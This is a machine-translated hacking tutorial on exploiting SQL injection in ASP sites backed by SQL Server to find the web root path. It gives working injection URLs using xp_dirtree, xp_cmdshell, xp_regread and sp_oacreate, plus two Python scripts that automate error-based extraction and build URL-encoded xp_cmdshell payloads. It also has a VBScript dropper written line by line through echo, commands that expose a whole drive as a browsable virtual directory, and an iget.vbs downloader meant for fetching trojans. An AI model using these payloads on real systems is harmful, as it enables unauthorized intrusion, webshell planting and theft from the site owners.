This page is a machine-translated mirror of the original article.


[Security Tutorial] Obtaining the web site's physical path via SQL injection

Posted on 2/7/2015 10:19:16 PM
Obtaining the web site's physical path via SQL injection

If the target only exposes port 80 (so you cannot reach SQL Server directly), you will find the methods below all the more useful.
Almost none of the methods here were discovered by me; what this article adds is some personal experience and tricks from using them during injection.
There are 4 methods (that I know of at the moment).

First method:

This is the method introduced in the article <Weird SQL Injection> (怪异的SQL注入).
It uses SQL Server's xp_dirtree. First the method itself, then its advantages and disadvantages (some additions have been made to the original text).

Create a table

Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
Returns: the normal page. That means the table was created. Carry on!
(The column is made bigger than in the original, because I have run into a file with a very long name. Keep the second column even though it looks useless: xp_dirtree returns two columns, subdirectory and depth, and INSERT ... EXEC fails unless the table has the same number of columns. The supplement at the end of this article shows that the depth column is in fact the most useful part.)

Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\' --
Returns: the normal page. That means every directory on the C: drive was written into the table. Cool! Next the table has to be read back out, and the way to do that is to force the values out through error messages. (It seems to be the only way.)

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '@Inetpub' to a column of data type int.

The first directory name in the table is leaked in the error message. Now exclude it and ask for the next one:

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'test' to a column of data type int.

The next name comes out. Carry on:

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub','test'))--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'haha' to a column of data type int.

And the next one.

You get the idea: every name you obtain goes into the parentheses, as many as you like, until the subquery has nothing left to return (0<>NULL is not true, so the page then shows no record rather than an error).

A little trick:

Sometimes you will find that for an input like

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--

the page shows no error at all and is displayed normally.
Don't panic.
Look at 0<>(select top 1 paths from dirs): the page rendered normally, so the value was converted to int without an error, which means the directory name is purely numeric.
So test how big it is:

100>(select top 1 paths from dirs)

Page normal.
With greater-than and less-than tests like this you can narrow the number down quickly (halve the range each time).
Eventually, when

59=(select top 1 paths from dirs)

gives a normal page,
ok, the name is 59.
Now enter

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('59'))--

Remember the quotation marks: not in() compares the column as a string.
From here the method is the same as the original.
There is one more problem.
Sometimes, after excluding 59 as above, you find that the next folder is still 59.
What is going on?
Have you noticed that 059 and 59 are the same number? The comparison converts the varchar to int, so a folder named '059' compares equal to 59, but not in('59') is a string comparison and does not exclude it.
That is the reason. Exclude the other spelling as well:

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('59','059'))--

and the next folder name shows up. ok
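The extraction loop above (ask for top 1, read the name out of the conversion error, add it to not in(), repeat) and the numeric-name fallback are mechanical, so here is the whole procedure automated in Python. This is an added example, not code from the original article: the "target" is a mock that imitates SQL Server's implicit varchar-to-int conversion for the handful of conditions the article uses, the folder names in SAMPLE_DIRS are constructed, and the count(*) query used to confirm a spelling is an addition of this example rather than something the article does. To use it for real, replace mock_target with a function that puts the condition into the request and classifies the response.

```python
"""Added example (not part of the original article): driving the error-based
extraction loop from Method 1 automatically, including the numeric-name
fallback from the "little trick". The target is a mock that imitates SQL
Server's implicit varchar-to-int conversion; the folder names are constructed."""

import re

# Constructed sample of what `insert dirs exec master.dbo.xp_dirtree 'c:\'`
# might have left in the paths column; not real data.
SAMPLE_DIRS = ["Inetpub", "test", "59", "059", "haha", "0", "Program Files"]

SUBQ_RE = r"\(select top 1 paths from dirs(?: where paths not in\((.*)\))?\)"
COND_RE = re.compile(r"^(\d+)(<>|=|>)" + SUBQ_RE + r"$")
COUNT_RE = re.compile(r"^1<=\(select count\(\*\) from dirs where paths='((?:[^']|'')*)'\)$")
INT_RE = re.compile(r"^\s*[+-]?\d+\s*$")   # what CONVERT(int, varchar) accepts


def _unquote_list(sql_list):
    """'a','b''c'  ->  {"a", "b'c"}"""
    return {s.replace("''", "'") for s in re.findall(r"'((?:[^']|'')*)'", sql_list or "")}


def mock_target(condition, rows=SAMPLE_DIRS):
    """Imitate the vulnerable page for `... and <condition>--`.
    Returns 'error:<value>' (the 80040e07 conversion error leaks the value),
    'true' (page renders normally) or 'false' (condition false or NULL)."""
    m = COUNT_RE.match(condition)
    if m:
        return "true" if rows.count(m.group(1).replace("''", "'")) >= 1 else "false"
    m = COND_RE.match(condition)
    if not m:
        raise ValueError("mock does not understand: " + condition)
    number, op, excluded = int(m.group(1)), m.group(2), _unquote_list(m.group(3))
    remaining = [r for r in rows if r not in excluded]   # TOP 1 without ORDER BY: table order assumed
    if not remaining:
        return "false"                    # subquery yields NULL; the comparison is unknown
    value = remaining[0]
    if not INT_RE.match(value):           # int outranks varchar, so the varchar is converted
        return "error:" + value
    v = int(value)
    return "true" if {"<>": number != v, "=": number == v, ">": number > v}[op] else "false"


def subquery(excluded):
    """The `select top 1 paths from dirs where paths not in(...)` part of the URLs above."""
    if not excluded:
        return "(select top 1 paths from dirs)"
    quoted = ",".join("'" + e.replace("'", "''") + "'" for e in excluded)
    return "(select top 1 paths from dirs where paths not in(%s))" % quoted


def find_number(probe, excluded):
    """The greater-than guessing from the article, done as doubling + binary search."""
    sq = subquery(excluded)
    hi = 1
    while probe("%d>%s" % (hi, sq)) != "true":      # find an upper bound first
        hi *= 2
        if hi > 2 ** 31:
            raise RuntimeError("value is not a non-negative int in range")
    lo = 0                                           # invariant: lo <= value < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if probe("%d>%s" % (mid, sq)) == "true":
            hi = mid
        else:
            lo = mid
    return lo


def exists(probe, name):
    """Confirm a spelling as a string, since 59 and 059 are equal as ints."""
    return probe("1<=(select count(*) from dirs where paths='%s')" % name.replace("'", "''")) == "true"


def dump_dirs(probe, limit=10000):
    """Pull every row of dirs out through the error message, one request per row."""
    found = []
    while len(found) < limit:
        r = probe("0<>" + subquery(found))
        if r.startswith("error:"):
            name = r[len("error:"):]
        elif r == "false" and probe("0=" + subquery(found)) != "true":
            break                                     # NULL: nothing left (a folder named 0 gives true here)
        else:
            v = find_number(probe, found)
            # not in() compares strings, so after excluding '59' a folder '059'
            # still converts to 59: try the zero-padded spellings until one is new.
            for pad in range(8):
                name = "0" * pad + str(v)
                if name not in found and exists(probe, name):
                    break
            else:
                raise RuntimeError("numeric folder %d has an unexpected spelling" % v)
        found.append(name)
    return found


if __name__ == "__main__":
    for d in dump_dirs(mock_target):
        print(d)
```

Run stand-alone it prints the seven constructed names in table order, including 59, 059 and 0, which are exactly the cases the trick above is about. The numeric branch only recovers non-negative integers; a name such as ' 59' or '+59' also converts cleanly to int and would need its own spelling list.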

Analysis of advantages and disadvantages:

The advantage is that every SQL Server login can use it, because xp_dirtree is granted to public by default.
The disadvantage is that it returns the names of all folders at every level, apparently in no particular order; finding the folder you want among thousands or tens of thousands of names is painful.
And even when you find a folder with the right name, nothing guarantees it is the web root, which is really painful; a lot of the time it comes down to luck and patience.
I wish you success.

Method 2:

Use xp_cmdshell

Everyone must be familiar with this one, so only briefly:

Create a table

Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
Returns: the normal page. That means the table was created. Carry on!
(The column is made bigger than in the original because of long file names. One column is enough here, because xp_cmdshell returns a single output column.)

Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'dir c:\ /B/D' --
Returns: the normal page. That means the listing of the C: drive was written into the table. dir c:\ /B/D is used here: /B prints bare names, one per line, which is exactly what a one-column table wants; if you don't know what /D does, try it and see.

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '@Inetpub' to a column of data type int.

The first name is leaked. Exclude it and ask for the next one:

Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'test' to a column of data type int.

And so on, exactly as in Method 1 (including the numeric-name trick).

Two more extended procedures are sometimes useful here:

(1) xp_availablemedia lists the current drives. It returns four columns (name, low free, high free, media type), so it needs a receiving table with four columns; the one-column dirs table above will not do. Here it goes into a table called temp created with matching columns:

5 ; insert temp exec master.dbo.xp_availablemedia; --

Then read the drive list and the related information out of temp with the same error-based trick.

(2) xp_subdirs lists the immediate subdirectories of a path. It returns one column, so it can go straight into dirs:

5 ; insert into dirs exec master.dbo.xp_subdirs 'c:\' ; --

Analysis of advantages and disadvantages:

Obviously this avoids xp_dirtree's problem of dumping every level into one heap: only the top-level listing is returned, which is much easier to search.
The disadvantages are just as obvious: only members of the sysadmin role (sa) can run xp_cmdshell, and the administrator may have dropped the extended procedure altogether (it is, after all, far too powerful).

Method 3:

This approach is good.
The following is the original text:
I thought of using the adsutil.vbs script, and ran

a'; exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/1/root>a.txt'; --

Quite a long one, isn't it? It enumerates the settings of the first web site in IIS (including the physical directory it is served from, of course) and writes them into a.txt.
The actual location of a.txt is of course c:\winnt\system32 (the current directory of the SQL Server service), which is no problem in itself. But if an administrator has deleted adsutil.vbs
or moved it somewhere else,
there is nothing we can do (short of writing one ourselves with echo, line by line).

Step 2: use echo to write the following script to c:\, which isn't much:

..... xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs'; --
..... xp_cmdshell 'echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs'; --
..... (one xp_cmdshell per line of the script: the first uses > to create the file, the rest >> to append)
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject")
Set WshShell = Wscript.createObject("Wscript.Shell")
spa=WshShell.Environment("process")("windir")
' a.txt was written to the SQL Server service's current directory, %windir%\system32
set fil =fso1.opentextfile(spa & "\system32\a.txt")
do while not fil.atendofstream
nr=fil.readline
' adsutil prints the site root as:  Path  : (STRING) "C:\Inetpub\wwwroot"
' take what sits between the quotes that follow the closing parenthesis
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)
exit do
end if
loop
' create dd.asp in the web root (2 = ForWriting, true = create if missing)
set fil1 =fso1.opentextfile(pa & "\dd.asp",2,true)
fil1.writeline ""
---------------cut here-------------------------------------

Step 3: run read.vbs. It reads a.txt, finds the physical path of the site
and writes a file called dd.asp into the root of the web site. Whether it worked you find out by requesting
http://x.x.x.x/dd.asp
Returns: \xxx
A good method.
However, the original text seems to have a problem:
these two lines

set fil =fso1.opentextfile(spa & "\system32\a.txt")
set fil1 =fso1.opentextfile(pa & "\dd.asp",2,true)

give an error when submitted. (The & is the query-string separator: the web server splits the injected parameter at it and the statement arrives truncated; cmd.exe would also treat an unquoted & in the echo line as a command separator unless it is escaped as ^&.)
So we thought of the plus sign, which concatenates strings in VBScript just like &.
And what should dd.asp contain? Write pa into it.
So I changed it to:

-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject")
Set WshShell = Wscript.createObject("Wscript.Shell")
spa=WshShell.Environment("process")("windir")
set fil =fso1.opentextfile(spa + "\system32\a.txt")
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa + "\dd.asp",2,true)
fil1.writeline pa
---------------cut here--------------------------------------
Because the plus sign is turned into a space when it is submitted through the browser, it has to be URL-encoded as %2B as well. The same applies to the +3 inside the mid() call: every + in the payload must be sent as %2B. So the final version, as it is typed into the URL, is:
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject")
Set WshShell = Wscript.createObject("Wscript.Shell")
spa=WshShell.Environment("process")("windir")
set fil =fso1.opentextfile(spa %2B "\system32\a.txt")
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,")")%2B3,len(nr)-instr(nr,")")-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true)
fil1.writeline pa
---------------cut here--------------------------------------

If site 1 turns out not to be the one, change it to 2, 3, 4, ...:

a'; exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root>a.txt'; --

But this method only works on Windows 2000: under 2003 the identifiers of newly created sites are not numbered 1, 2, 3, 4 but look randomly generated. I compared several
under 2003 and found no pattern.
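The three steps above boil down to writing a script to disk one echo per request while making sure nothing in the line is eaten by cmd.exe or by the URL. As an added example (not part of the original article), the Python below builds those xp_cmdshell statements for read.vbs and URL-encodes them so that & and + survive the query string. It goes a little beyond the article by caret-escaping any cmd.exe metacharacter that sits outside double quotes, so the original & version of the script would be written correctly too. The base URL, parameter name and output path are assumptions, and nothing is sent anywhere.

```python
"""Added example (not from the original article): generate the injected
xp_cmdshell echo statements that write a VBScript to disk line by line, and
URL-encode them so that '&' and '+' survive the query string.
Target URL, parameter name and output path are assumptions."""

from urllib.parse import quote, unquote_plus

BASE = "http://www.xxxxx.com/down/list.asp?id=1"   # assumed injection point

# The script from Method 3 (a.txt path assumed to match the adsutil redirect).
READ_VBS = [
    'set fso1=createobject("scripting.filesystemobject")',
    'Set WshShell = Wscript.createObject("Wscript.Shell")',
    'spa=WshShell.Environment("process")("windir")',
    'set fil =fso1.opentextfile(spa & "\\system32\\a.txt")',
    'do while not fil.atendofstream',
    'nr=fil.readline',
    'if left(nr,4)="Path" then',
    'pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)',
    'exit do',
    'end if',
    'loop',
    'set fil1 =fso1.opentextfile(pa & "\\dd.asp",2,true)',
    'fil1.writeline pa',
]

CMD_META = set('&|<>^')


def cmd_escape(line):
    """Caret-escape cmd.exe metacharacters that sit outside double quotes, so
    `echo ...` prints them instead of interpreting them (inside quotes cmd
    already treats them literally, and a caret there would be printed)."""
    out, in_quotes = [], False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_META and not in_quotes:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def echo_statement(line, path, first):
    """T-SQL statement that writes one script line via xp_cmdshell:
    '>' creates the file for the first line, '>>' appends the rest."""
    cmd = 'echo %s%s%s' % (cmd_escape(line), '>' if first else '>>', path)
    return "exec master..xp_cmdshell '%s'" % cmd.replace("'", "''")   # T-SQL quote doubling


def injected_urls(lines, base=BASE, path="c:\\read.vbs"):
    """One request per script line, as the article does it."""
    urls = []
    for i, line in enumerate(lines):
        payload = ";" + echo_statement(line, path, i == 0) + "--"
        # quote() with safe="" encodes everything but unreserved characters, so
        # '&' becomes %26 and '+' becomes %2B; a raw '+' would decode to a space.
        urls.append(base + quote(payload, safe=""))
    return urls


def server_side_view(url, base=BASE):
    """What the ASP page receives after the web server decodes the parameter."""
    return unquote_plus(url[len(base):])


if __name__ == "__main__":
    for u in injected_urls(READ_VBS):
        print(u)
```

Decode any of the generated URLs with server_side_view to see the statement exactly as SQL Server will execute it; that is the quickest way to spot a stray & or a + that arrived as a space before sending anything.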

Analysis of advantages and disadvantages:

As above, not every user can run xp_cmdshell. Another problem is that adsutil.vbs does not necessarily exist, or is not necessarily at that path, although if you really want to you can
write one with echo (an old, old trick). And what if there are many sites on the host? I have met a host with nine sites where only the eighth was the right one;
it is hard for anyone to have the patience to keep going that long, most would have given up long before. Also, it cannot be used on 2003!
But to be honest, this method is indeed a good one.

Method 4:

This method reads the path out of the registry with xp_regread and similar procedures.
The recommended way to get the web root (reading the registry through a stored procedure) is the built-in extended procedure xp_regread (reads a registry value; executable by public):

Statement: http://www.xxx.com/list.asp?classid=1; create table newtable(id int identity(1,1),paths varchar(500)) declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--

(Three things are easy to get wrong here: the output parameter of xp_regread is named @value; the insert must target the table you just created, newtable(paths); and @test should be as wide as that column, or a long path will not fit.)

On IIS 4/5 (NT 4 / Windows 2000) the default site's virtual roots are also recorded in the registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, and the value named / is the root directory.
Read the value out with the same error-based trick:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--
Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'E:\www,,201' to a column of data type int.

So the web root is E:\www (the value is stored as path,username,access flags). From there you can write an ASP trojan straight into it with FSO.
What if you cannot get the web directory at all? Then you have to guess whether the site is the default web site or one named after the domain. Or make a virtual directory of your own:

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default website" -v "e","e:\"'

This creates a virtual directory e under the default web site, pointing at the E: drive.

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

This enables directory browsing on the virtual directory e (the + must be sent as %2B, or it arrives as a space). You have opened a virtual directory of your own through which the whole drive can be browsed. I had racked my brains over web directory paths; now my eyes are open. (mkwebdir.vbs and chaccess.vbs ship in c:\inetpub\adminscripts alongside adsutil.vbs; adjust the path if they are not in wwwroot.) Getting a webshell through MS SQL is the end of our work here; the rest of the job is yours.
The method is good: read it from the registry, convenient and quick!

Analysis of advantages and disadvantages:

The advantage is of course that it is convenient and quick. The downside is that you only see the path of the default IIS site; if the site you are after is not the default one there is nothing you can do (I tracked it with RegSnap). And under 2003
not even the default site's path shows up, since IIS 6 keeps its configuration in the metabase and no longer writes that registry key. Painful.

By the way, there are other ways to continue the intrusion besides finding the web path, for example uploading a reverse-connect trojan through tftp, or writing an iget.vbs that downloads whatever you want.
The iget.vbs code is as follows:

---------start----------
' usage: cscript iget.vbs <url> <local file>
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3       ' read/write
sGet.Type = 1       ' binary
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2   ' 2 = overwrite an existing file
----------end-----------

Supplement to this article:

Recently I found that I had not studied Chairman Mao's teachings deeply enough, so let me add something here.
In fact there is no need to compare the methods above at all: xp_dirtree is the best, and this one method alone is enough.
It's just because I was too ..............
Today I'll dig up xp_dirtree's secret again.
Run exec master..xp_dirtree 'd:\test'
Suppose test contains two folders, test1 and test2, and test1 contains test3.
The result is

subdirectory    depth
test1           1
test3           2
test2           1

So the depth column is the level of the directory.
Now we know what to do:

http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)--

With id=1 added you get only the first-level directories (id=2 the second level, and so on), and the extraction loop from Method 1 runs over a much shorter list.